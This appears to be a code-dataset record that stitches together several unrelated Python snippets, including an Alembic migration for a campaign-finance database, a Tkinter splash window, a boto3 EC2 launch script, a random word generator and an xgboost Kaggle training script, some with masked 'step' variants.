op.create_index('ix_contract_consultant_id', 'contract', [\n 'consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'],\n unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'\n ], unique=False)\n op.create_table(u'stance', sa.Column('id', postgresql.UUID(),\n server_default=func.uuid_generate_v4(), nullable=False), sa.Column(\n 'created', sa.DateTime(timezone=True), server_default=func.now(),\n nullable=False), sa.Column('updated', sa.DateTime(timezone=True),\n server_default=func.now(), nullable=False), sa.Column('voted_yes',\n sa.Boolean(), nullable=False), sa.Column('committee_id', postgresql\n .UUID(), nullable=False), sa.Column('ballot_measure_id', postgresql\n .UUID(), nullable=False), sa.ForeignKeyConstraint([\n 'ballot_measure_id'], [u'ballot_measure.id']), sa.\n ForeignKeyConstraint(['committee_id'], [u'committee.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('committee_id',\n 'ballot_measure_id'))\n op.create_index('ix_stance_ballot_measure_id', 'stance', [\n 'ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'],\n unique=False)\n op.create_table(u'ballot_measure_tags', sa.Column('id', postgresql.UUID\n (), server_default=func.uuid_generate_v4(), nullable=False), sa.\n Column('created', sa.DateTime(timezone=True), server_default=func.\n now(), nullable=False), sa.Column('updated', sa.DateTime(timezone=\n True), server_default=func.now(), nullable=False), sa.Column(\n 'ballot_measure_id', postgresql.UUID(), nullable=False), sa.Column(\n 'tag_id', postgresql.UUID(), nullable=False), sa.\n ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id']),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id']), sa.\n PrimaryKeyConstraint('id'), sa.UniqueConstraint('ballot_measure_id',\n 'tag_id'))\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags',\n ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n\n\ndef downgrade():\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id',\n 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n",
"step-5": "\"\"\"Initial migration\n\nRevision ID: 1f2296edbc75\nRevises: 7417382a3f1\nCreate Date: 2014-01-19 23:04:58.877817\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1f2296edbc75'\ndown_revision = '7417382a3f1'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nfrom sqlalchemy import func\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table(u'consultant',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('address', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'service',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'ballot_type',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('percent_required', sa.Numeric(precision=2, scale=2), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'employer',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'tag',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'election',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('date', sa.Date(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(u'donor',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('first_name', sa.Text(), nullable=False),\n sa.Column('last_name', sa.Text(), nullable=False),\n sa.Column('address', sa.Text(), nullable=False),\n sa.Column('latitude', sa.Float(), nullable=False),\n sa.Column('longitude', sa.Float(), nullable=False),\n sa.Column('employer_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['employer_id'], [u'employer.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('first_name','last_name','latitude','longitude')\n )\n op.create_index('ix_donor_employer_id', 'donor', ['employer_id'], unique=False)\n op.create_table(u'committee',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=False),\n sa.Column('filer_id', sa.Text(), nullable=True),\n sa.Column('sponsor', sa.Text(), nullable=True),\n sa.Column('election_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_committee_election_id', 'committee', ['election_id'], unique=False)\n op.create_table(u'ballot_measure',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('name', sa.Text(), nullable=True),\n sa.Column('prop_id', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=True),\n sa.Column('num_yes', sa.Integer(), nullable=True),\n sa.Column('num_no', sa.Integer(), nullable=True),\n sa.Column('passed', sa.Boolean(), nullable=True),\n sa.Column('ballot_type_id', postgresql.UUID(), nullable=True),\n sa.Column('election_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['ballot_type_id'], [u'ballot_type.id'], ),\n sa.ForeignKeyConstraint(['election_id'], [u'election.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_ballot_measure_election_id', 'ballot_measure', ['election_id'], unique=False)\n op.create_index('ix_ballot_measure_ballot_type_id', 'ballot_measure', ['ballot_type_id'], unique=False)\n op.create_table(u'donation',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('amount', sa.Float(), nullable=False),\n sa.Column('transaction_date', sa.Date(), nullable=False),\n sa.Column('donor_id', postgresql.UUID(), nullable=False),\n sa.Column('committee_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),\n sa.ForeignKeyConstraint(['donor_id'], [u'donor.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_donation_committee_id', 'donation', ['committee_id'], unique=False)\n op.create_index('ix_donation_donor_id', 'donation', ['donor_id'], unique=False)\n op.create_table(u'contract',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('payment', sa.Float(), nullable=False),\n sa.Column('consultant_id', postgresql.UUID(), nullable=False),\n sa.Column('service_id', postgresql.UUID(), nullable=True),\n sa.Column('description', sa.Text(), nullable=True),\n sa.Column('committee_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),\n sa.ForeignKeyConstraint(['consultant_id'], [u'consultant.id'], ),\n sa.ForeignKeyConstraint(['service_id'], [u'service.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_contract_consultant_id', 'contract', ['consultant_id'], unique=False)\n op.create_index('ix_contract_service_id', 'contract', ['service_id'], unique=False)\n op.create_index('ix_contract_committee_id', 'contract', ['committee_id'], unique=False)\n op.create_table(u'stance',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('voted_yes', sa.Boolean(), nullable=False),\n sa.Column('committee_id', postgresql.UUID(), nullable=False),\n sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),\n sa.ForeignKeyConstraint(['committee_id'], [u'committee.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('committee_id','ballot_measure_id')\n )\n op.create_index('ix_stance_ballot_measure_id', 'stance', ['ballot_measure_id'], unique=False)\n op.create_index('ix_stance_committee_id', 'stance', ['committee_id'], unique=False)\n op.create_table(u'ballot_measure_tags',\n sa.Column('id', postgresql.UUID(), server_default=func.uuid_generate_v4(), nullable=False),\n sa.Column('created', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('updated', sa.DateTime(timezone=True), server_default=func.now(), nullable=False),\n sa.Column('ballot_measure_id', postgresql.UUID(), nullable=False),\n sa.Column('tag_id', postgresql.UUID(), nullable=False),\n sa.ForeignKeyConstraint(['ballot_measure_id'], [u'ballot_measure.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], [u'tag.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('ballot_measure_id','tag_id')\n )\n op.create_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags', ['tag_id'], unique=False)\n op.create_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags', ['ballot_measure_id'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_ballot_measure_tags_ballot_measure_id', 'ballot_measure_tags')\n op.drop_index('ix_ballot_measure_tags_tag_id', 'ballot_measure_tags')\n op.drop_table(u'ballot_measure_tags')\n op.drop_index('ix_stance_committee_id', 'stance')\n op.drop_index('ix_stance_ballot_measure_id', 'stance')\n op.drop_table(u'stance')\n op.drop_index('ix_contract_committee_id', 'contract')\n op.drop_index('ix_contract_service_id', 'contract')\n op.drop_index('ix_contract_consultant_id', 'contract')\n op.drop_table(u'contract')\n op.drop_index('ix_donation_donor_id', 'donation')\n op.drop_index('ix_donation_committee_id', 'donation')\n op.drop_table(u'donation')\n op.drop_index('ix_ballot_measure_ballot_type_id', 'ballot_measure')\n op.drop_index('ix_ballot_measure_election_id', 'ballot_measure')\n op.drop_table(u'ballot_measure')\n op.drop_index('ix_committee_election_id', 'committee')\n op.drop_table(u'committee')\n op.drop_index('ix_donor_employer_id', 'donor')\n op.drop_table(u'donor')\n op.drop_table(u'election')\n op.drop_table(u'tag')\n op.drop_table(u'employer')\n op.drop_table(u'ballot_type')\n op.drop_table(u'service')\n op.drop_table(u'consultant')\n ### end Alembic commands ###\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from Tkinter import *
import time
def create_window():
window = Toplevel(root)
w, h = root.winfo_screenwidth(), root.winfo_screenheight()
canvas = Canvas(window,width=w,height=h)
canvas.create_text(w/2,h/2,text="this will close after 3 seconds",font="Arial")
canvas.pack()
window.overrideredirect(1)
window.geometry("%dx%d+0+0" % (w, h))
window.after(3000, lambda: window.destroy())
root = Tk()
root.title("3 Second Splash")
root.geometry("250x250")
b = Button(root, text="Launch splash window", command=create_window)
b.place(relx=0.5,rely=0.5,anchor=CENTER)
#b.pack()
root.mainloop()
|
normal
|
{
"blob_id": "cac49a9a2cb753bb81c45ac1d2d887b1f48dd9bb",
"index": 9562,
"step-1": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\nroot.title('3 Second Splash')\nroot.geometry('250x250')\n<mask token>\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n",
"step-3": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n",
"step-4": "from Tkinter import *\nimport time\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n",
"step-5": "from Tkinter import *\nimport time\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window,width=w,height=h)\n canvas.create_text(w/2,h/2,text=\"this will close after 3 seconds\",font=\"Arial\")\n canvas.pack()\n window.overrideredirect(1)\n window.geometry(\"%dx%d+0+0\" % (w, h))\n window.after(3000, lambda: window.destroy())\n \nroot = Tk()\nroot.title(\"3 Second Splash\")\nroot.geometry(\"250x250\")\nb = Button(root, text=\"Launch splash window\", command=create_window)\nb.place(relx=0.5,rely=0.5,anchor=CENTER)\n#b.pack()\n\nroot.mainloop()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
def func_sum_even(n):
e_digit1=n%10
n//=10
e_digit2=n%10
e_digit3=n//10
sum_even=e_digit1*(1-e_digit1%2)+e_digit2*(1-e_digit2%2)+e_digit3*(1-e_digit3%2)
return sum_even
# n=int(input())
# print(func_sum_even(n))
|
normal
|
{
"blob_id": "d567dfe29380a34534308446a9c8940cede84083",
"index": 7571,
"step-1": "<mask token>\n",
"step-2": "def func_sum_even(n):\n e_digit1 = n % 10\n n //= 10\n e_digit2 = n % 10\n e_digit3 = n // 10\n sum_even = e_digit1 * (1 - e_digit1 % 2) + e_digit2 * (1 - e_digit2 % 2\n ) + e_digit3 * (1 - e_digit3 % 2)\n return sum_even\n",
"step-3": "def func_sum_even(n):\n e_digit1=n%10\n n//=10\n e_digit2=n%10\n e_digit3=n//10\n sum_even=e_digit1*(1-e_digit1%2)+e_digit2*(1-e_digit2%2)+e_digit3*(1-e_digit3%2)\n return sum_even\n# n=int(input())\n# print(func_sum_even(n)) ",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import boto3
import json
region = 'us-east-2'
ec2 = boto3.resource('ec2',region)
ImageId = 'ami-07efac79022b86107'
KeyName = 'aws_keypair'
InstanceType = 't2.micro'
#IamInstanceProfile =
instances = ec2.create_instances(
ImageId =ImageId,
MinCount = 1,
MaxCount = 5,
KeyName = KeyName,
InstanceType = InstanceType,
IamInstanceProfile = {
'Name' : 'Test-ec2-pro',
}
)
|
normal
|
{
"blob_id": "b7606befe123c4fb6840a1bc62e43e6721edfcc3",
"index": 5005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nregion = 'us-east-2'\nec2 = boto3.resource('ec2', region)\nImageId = 'ami-07efac79022b86107'\nKeyName = 'aws_keypair'\nInstanceType = 't2.micro'\ninstances = ec2.create_instances(ImageId=ImageId, MinCount=1, MaxCount=5,\n KeyName=KeyName, InstanceType=InstanceType, IamInstanceProfile={'Name':\n 'Test-ec2-pro'})\n",
"step-3": "import boto3\nimport json\nregion = 'us-east-2'\nec2 = boto3.resource('ec2', region)\nImageId = 'ami-07efac79022b86107'\nKeyName = 'aws_keypair'\nInstanceType = 't2.micro'\ninstances = ec2.create_instances(ImageId=ImageId, MinCount=1, MaxCount=5,\n KeyName=KeyName, InstanceType=InstanceType, IamInstanceProfile={'Name':\n 'Test-ec2-pro'})\n",
"step-4": "import boto3\nimport json\n\nregion = 'us-east-2'\n\nec2 = boto3.resource('ec2',region)\n\nImageId = 'ami-07efac79022b86107'\nKeyName = 'aws_keypair'\nInstanceType = 't2.micro'\n#IamInstanceProfile =\ninstances = ec2.create_instances(\n ImageId =ImageId,\n MinCount = 1,\n MaxCount = 5,\n KeyName = KeyName,\n InstanceType = InstanceType,\n IamInstanceProfile = {\n 'Name' : 'Test-ec2-pro',\n\n }\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
def main():
pattern = input(
'Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
consonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',
'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']
vowels = ['a', 'e', ' i', 'o', 'u']
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
def main():
pattern = input(
'Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
main()
<|reserved_special_token_1|>
import random
consonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',
'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']
vowels = ['a', 'e', ' i', 'o', 'u']
def make_word(user_input):
word = ''
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else:
print(
"""Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]
"""
)
return word
def main():
pattern = input(
'Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
main()
<|reserved_special_token_1|>
import random
consonants = [
'b', 'c', 'd', 'f', 'g',
'h', 'j', 'k', 'l', 'm',
'n', 'p', 'q', 'r', 's',
't', 'v', 'w', 'x', 'y',
'z'
]
vowels = [
'a', 'e',' i', 'o', 'u'
]
def make_word(user_input):
word = ""
for letter in user_input:
letter = letter.lower()
if letter == 'c':
word += random.choice(consonants)
elif letter == 'v':
word += random.choice(vowels)
elif letter.isspace():
word += ' '
else :
print('Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n')
return word
def main():
pattern = input('Enter your lexical pattern, c for consonant. v for vowel\n')
print(make_word(pattern))
main()
|
flexible
|
{
"blob_id": "a4f4137b9310ebc68515b9cae841051eda1f0360",
"index": 3522,
"step-1": "<mask token>\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\ndef main():\n pattern = input(\n 'Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\n\n<mask token>\n",
"step-3": "<mask token>\nconsonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',\n 'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']\nvowels = ['a', 'e', ' i', 'o', 'u']\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\ndef main():\n pattern = input(\n 'Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\n\nmain()\n",
"step-4": "import random\nconsonants = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'p',\n 'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']\nvowels = ['a', 'e', ' i', 'o', 'u']\n\n\ndef make_word(user_input):\n word = ''\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else:\n print(\n \"\"\"Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\n\"\"\"\n )\n return word\n\n\ndef main():\n pattern = input(\n 'Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\n\nmain()\n",
"step-5": "import random\n\n\nconsonants = [\n 'b', 'c', 'd', 'f', 'g',\n 'h', 'j', 'k', 'l', 'm',\n 'n', 'p', 'q', 'r', 's',\n 't', 'v', 'w', 'x', 'y',\n 'z'\n]\nvowels = [\n 'a', 'e',' i', 'o', 'u'\n]\n\ndef make_word(user_input):\n word = \"\"\n\n for letter in user_input:\n letter = letter.lower()\n if letter == 'c':\n word += random.choice(consonants)\n elif letter == 'v':\n word += random.choice(vowels)\n elif letter.isspace():\n word += ' '\n else :\n print('Incorrect character passed. You must supply either a [c]onsonant, or a [vowel]\\n')\n return word\n\ndef main():\n pattern = input('Enter your lexical pattern, c for consonant. v for vowel\\n')\n print(make_word(pattern))\n\nmain()\n",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
print(1/2 * 2) # division ret
|
normal
|
{
"blob_id": "2c1e51f2c392e77299463d95a2277b3d2ca7c299",
"index": 4336,
"step-1": "<mask token>\n",
"step-2": "print(1 / 2 * 2)\n",
"step-3": "print(1/2 * 2) # division ret\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pandas
import evaluation
import sys
sys.path.append('D:\\libs\\xgboost\\wrapper')
import xgboost as xgb
# Read training data
folder = '../data/'
train = pandas.read_csv(folder + 'training.csv', index_col='id')
# Define features to drop from train data
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal', 'SPDhits', 'IP', 'IPSig', ]
# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
# 'SPDhits', 'p0_p', 'p1_p', 'p2_p', 'p0_eta', 'p1_eta', 'p2_eta', ]
variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',
'SPDhits', ]
# Train xgb model on train data
train_X = train.drop(variables_to_drop, 1).values
train_y = train['signal'].values
xg_train = xgb.DMatrix(train_X, label=train_y)
# params = {'silent': 1, 'nthread': 2, 'objective': 'binary:logistic', 'eval_metric': 'auc',
# 'max_depth': 6, 'eta': 0.3}
params = {'objective': 'binary:logistic',
'eta': 0.3,
'max_depth': 5,
'min_child_weight': 3,
'silent': 1,
'subsample': 0.7,
'colsample_bytree': 0.7,
'seed': 1,
'nthread': 2}
num_trees = 250
n_rounds = 120
watchlist = [(xg_train, 'train')]
xgb_model = xgb.train(params, xg_train, num_trees, watchlist)
# xgb_model = xgb.train(params, xg_train, n_rounds, watchlist)
# Check agreement test
check_agreement = pandas.read_csv(folder + 'check_agreement.csv', index_col='id')
xg_check_agreement = xgb.DMatrix(check_agreement.values)
agreement_probs = xgb_model.predict(xg_check_agreement)
ks = evaluation.compute_ks(
agreement_probs[check_agreement['signal'].values == 0],
agreement_probs[check_agreement['signal'].values == 1],
check_agreement[check_agreement['signal'] == 0]['weight'].values,
check_agreement[check_agreement['signal'] == 1]['weight'].values)
print 'KS metric', ks, ks < 0.09
# Check correlation test
check_correlation = pandas.read_csv(folder + 'check_correlation.csv', index_col='id')
xg_check_correlation = xgb.DMatrix(check_correlation.values)
correlation_probs = xgb_model.predict(xg_check_correlation)
cvm = evaluation.compute_cvm(correlation_probs, check_correlation['mass'])
print 'CvM metric', cvm, cvm < 0.002
# Compute weighted AUC on the training data with min_ANNmuon > 0.4
train_eval = train[train['min_ANNmuon'] > 0.4]
train_eval_X = train_eval.drop(variables_to_drop, 1).values
xg_train_eval = xgb.DMatrix(train_eval_X)
train_probs = xgb_model.predict(xg_train_eval)
AUC = evaluation.roc_auc_truncated(train_eval['signal'], train_probs)
print 'AUC', AUC
# Predict test, create file for kaggle
test = pandas.read_csv(folder + 'test.csv', index_col='id')
test_X = test.values
xg_test = xgb.DMatrix(test_X)
result = pandas.DataFrame({'id': test.index})
result['prediction'] = xgb_model.predict(xg_test)
result.to_csv('../submissions/xgb.csv', index=False, sep=',')
|
normal
|
{
"blob_id": "a6365104125725f11010c35eb0781c941de803f8",
"index": 7172,
